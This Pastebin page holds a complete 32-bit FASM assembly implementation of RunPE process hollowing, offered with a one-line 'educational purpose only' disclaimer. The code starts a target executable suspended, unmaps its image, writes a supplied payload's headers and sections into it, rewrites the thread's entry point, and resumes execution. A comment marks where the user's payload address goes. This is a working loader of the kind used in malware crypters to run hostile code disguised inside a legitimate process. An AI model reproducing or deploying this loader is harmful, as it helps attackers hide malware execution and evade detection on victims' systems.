API tools faq
paste
Advertisement
Guest User

ASM RunPE

a guest
Mar 3rd, 2020
668
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 5.51 KB | None | 0 0
raw download clone embed print report
  1. ;BASIC FASM RUNPE
  2. ;CODED BY ARMITAGE FOR EDUCATIONAL PURPOSE ONLY
  3.  
  4. format PE GUI 4.0
  5. entry start
  6. include "INCLUDE\WIN32A.INC"
  7.  
  8. section ".text" code executable readable
  9.  
  10.   start:
  11.  
  12.     push PROCESSINFORMATION
  13.     push STARTUP_INFO
  14.     push 0
  15.     push 0
  16.     push CREATE_SUSPENDED
  17.     push 0
  18.     push 0
  19.     push 0
  20.     push TargetProcess
  21.     push 0
  22.     call [CreateProcessA]
  23.     mov dword [CONTEXT], 10002h         ;Set CONTEXT.ContextFlags
  24.     push CONTEXT
  25.     push dword [PROCESSINFORMATION+4]   ;PROCESS_INFORMATION.hThread
  26.     call [GetThreadContext]
  27.     cmp eax, 0
  28.     je ExitProcess
  29.     mov eax, dword [CONTEXT+0A4h]   ;CONTEXT.EBX
  30.     add eax, 8                      ;PEB ADDRESS
  31.     push 0
  32.     push 4
  33.     push BASEADDRESS
  34.     push eax
  35.     push dword [PROCESSINFORMATION]
  36.     call [ReadProcessMemory]
  37.     push dword [BASEADDRESS]
  38.     push dword [PROCESSINFORMATION]
  39.     call [NtUnmapViewOfSection]
  40.     mov eax, dword [DataPtr]
  41.     mov ebx, eax
  42.     mov ax, word [eax]
  43.     cmp ax, 5A4Dh
  44.     jne ExitProcess
  45.     mov eax, dword [ebx+3Ch]     ;IMAGE_DOS_HEADER.e_lfanew
  46.     add eax, ebx
  47.     mov esi, eax                     ;Saving the pointer
  48.     mov eax, dword [eax]
  49.     cmp eax, 4550h
  50.     jne ExitProcess
  51.     mov ax, word [esi+6h]
  52.     mov word [NUMBEROFSECTIONS], ax
  53.     mov eax, dword [esi+34h]
  54.     mov dword [IMAGEBASE], eax
  55.     cmp eax, dword [BASEADDRESS]
  56.     jne ExitProcess
  57.     mov eax, dword [esi+50h]
  58.     mov dword [SIZEOFIMAGE], eax
  59.     mov eax, dword [esi+54h]
  60.     mov dword [SIZEOFHEADERS], eax
  61.     add esi, 0F8h
  62.     mov dword [SECTIONHEADER_PTR], esi
  63.     push PAGE_EXECUTE_READWRITE
  64.     push MEM_COMMIT or MEM_RESERVE
  65.     push dword [SIZEOFIMAGE]
  66.     push dword [IMAGEBASE]
  67.     push dword [PROCESSINFORMATION]
  68.     call [VirtualAllocEx]
  69.     push RETURN
  70.     push dword [SIZEOFHEADERS]
  71.     push dword [DataPtr]
  72.     push eax                           ;VirtualAllocEx returned value
  73.     push dword [PROCESSINFORMATION]
  74.     call [WriteProcessMemory]          ;WRITE IMAGE_NT_HEADERS
  75.     mov ecx, 0
  76.     mov edi, 28h
  77.  
  78.     WriteSections:
  79.  
  80.     mov eax, dword [SECTIONHEADER_PTR]
  81.     mov esi, eax                     ;We save the pointer into ESI
  82.  
  83.     add eax, 0Ch
  84.     mov dword [rTemp], eax
  85.     mov eax, ecx
  86.     mul edi
  87.     mov edx, dword [rTemp]
  88.     add edx, eax
  89.     mov eax, dword [edx]
  90.     add eax, dword [IMAGEBASE]       ;IMAGE_SECTION_HEADER[i].VirtualAddress + IMAGEBASE
  91.     mov dword [rTemp], eax           ;Save the value
  92.  
  93.     mov ebx, esi                     ;We save the pointer into EBX
  94.     add esi, 10h
  95.     mov eax, ecx
  96.     mul edi
  97.     add esi, eax
  98.     mov esi, dword [esi]             ;IMAGE_SECTION_HEADER[i].SizeOfRawData
  99.     mov dword [rTemp2], esi
  100.  
  101.     add ebx, 14h
  102.     mov eax, ecx
  103.     mul edi
  104.     add ebx, eax
  105.     mov eax, dword [ebx]             ;IMAGE_SECTION_HEADERS[i].PointerToRawData
  106.     add eax, dword [DataPtr]
  107.  
  108.     mov word [ecxtemp], ecx
  109.  
  110.     push RETURN
  111.     push dword [rTemp2]              ;IMAGE_SECTION_HEADERS[1].SizeOfRawData
  112.     push eax                         ;IMAGE_SECTION_HEADERS[i].PointerToRawData
  113.     push dword [rTemp]               ;IMAGE_SECTION_HEADERS[i].VirtualAddress + IMAGEBASE
  114.     push dword [PROCESSINFORMATION]  ;PROCESS_INFORMATION.hProcess
  115.     call [WriteProcessMemory]
  116.  
  117.     mov ecx, dword [ecxtemp]
  118.  
  119.     inc ecx
  120.     cmp cx, word [NUMBEROFSECTIONS]
  121.     jne WriteSections
  122.  
  123.     mov eax, dword [CONTEXT+0A4h]   ;CONTEXT.EBX
  124.     add eax, 8
  125.  
  126.     push 0
  127.     push 4
  128.     push BASEADDRESS
  129.     push eax
  130.     push dword [PROCESSINFORMATION]
  131.     call [WriteProcessMemory]
  132.  
  133.     mov eax, dword [DataPtr]
  134.     mov eax, dword [eax+3Ch]      ;IMAGE_DOS_HEADER.e_lfanew
  135.     add eax, dword [DataPtr]
  136.     mov eax, dword [eax+28h]      ;OptionalHeader.AddressOfEntryPoint
  137.     add eax, dword [IMAGEBASE]    ;It's not relative now :)
  138.     mov dword [CONTEXT+0B0h], eax
  139.     push CONTEXT
  140.     push dword [PROCESSINFORMATION+4]
  141.     call [SetThreadContext]
  142.     push dword [PROCESSINFORMATION+4]
  143.     call [ResumeThread]
  144.     push 0
  145.     call [Exit_Process]
  146.  
  147.  
  148. ExitProcess:
  149.    push 0
  150.    push dword [PROCESSINFORMATION]
  151.    call [TerminateProcess]
  152.    push dword [PROCESSINFORMATION+4]  ;PROCESS_INFORMATION.hThread
  153.    call [CloseHandle]
  154.    push dword [PROCESSINFORMATION]   ;PROCESS_INFORMATION.hProcess
  155.    call [CloseHandle]
  156.    push 0
  157.    call [Exit_Process]
  158.  
  159. section ".data" data readable writable
  160.  
  161.   TargetProcess db "C:\Users\XNXX.COM(lol)\Desktop\Coding\FASM IDE\RunPE.exe", 0
  162.   DataPtr dd 405058h ;write here the VA of your payload
  163.  
  164.  
  165.  
  166.  
  167. section ".bss" readable writable
  168.  
  169.   ;WE WILL USE BSS SEGMENT INSTEAD OF STRUCTURES :)
  170.   PROCESSINFORMATION rb 10h
  171.   STARTUP_INFO rb 44h
  172.   CONTEXT rb 2CCh
  173.   BASEADDRESS rd 1
  174.   RETURN rd 1
  175.   IMAGEBASE rd 1
  176.   SIZEOFIMAGE rd 1
  177.   SIZEOFHEADERS rd 1
  178.   NUMBEROFSECTIONS rw 1
  179.   SECTIONHEADER_PTR rd 1
  180.   rTemp rd 1
  181.   rTemp2 rd 1
  182.   ecxtemp rw 1
  183.  
  184. section ".idata" import data readable writeable
  185.  
  186.   library kernel,"KERNEL32.DLL",\
  187.           ntdll,"NTDLL.DLL"
  188.   import kernel,\
  189.          CreateProcessA, "CreateProcessA",\
  190.          GetThreadContext, "GetThreadContext",\
  191.          SetThreadContext, "SetThreadContext",\
  192.          VirtualAllocEx, "VirtualAllocEx",\
  193.          ReadProcessMemory, "ReadProcessMemory",\
  194.          WriteProcessMemory, "WriteProcessMemory",\
  195.          ResumeThread, "ResumeThread",\
  196.          CloseHandle, "CloseHandle",\
  197.          TerminateProcess, "TerminateProcess",\
  198.          Exit_Process,"ExitProcess"
  199.   import ntdll,\
  200.          NtUnmapViewOfSection, "NtUnmapViewOfSection"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!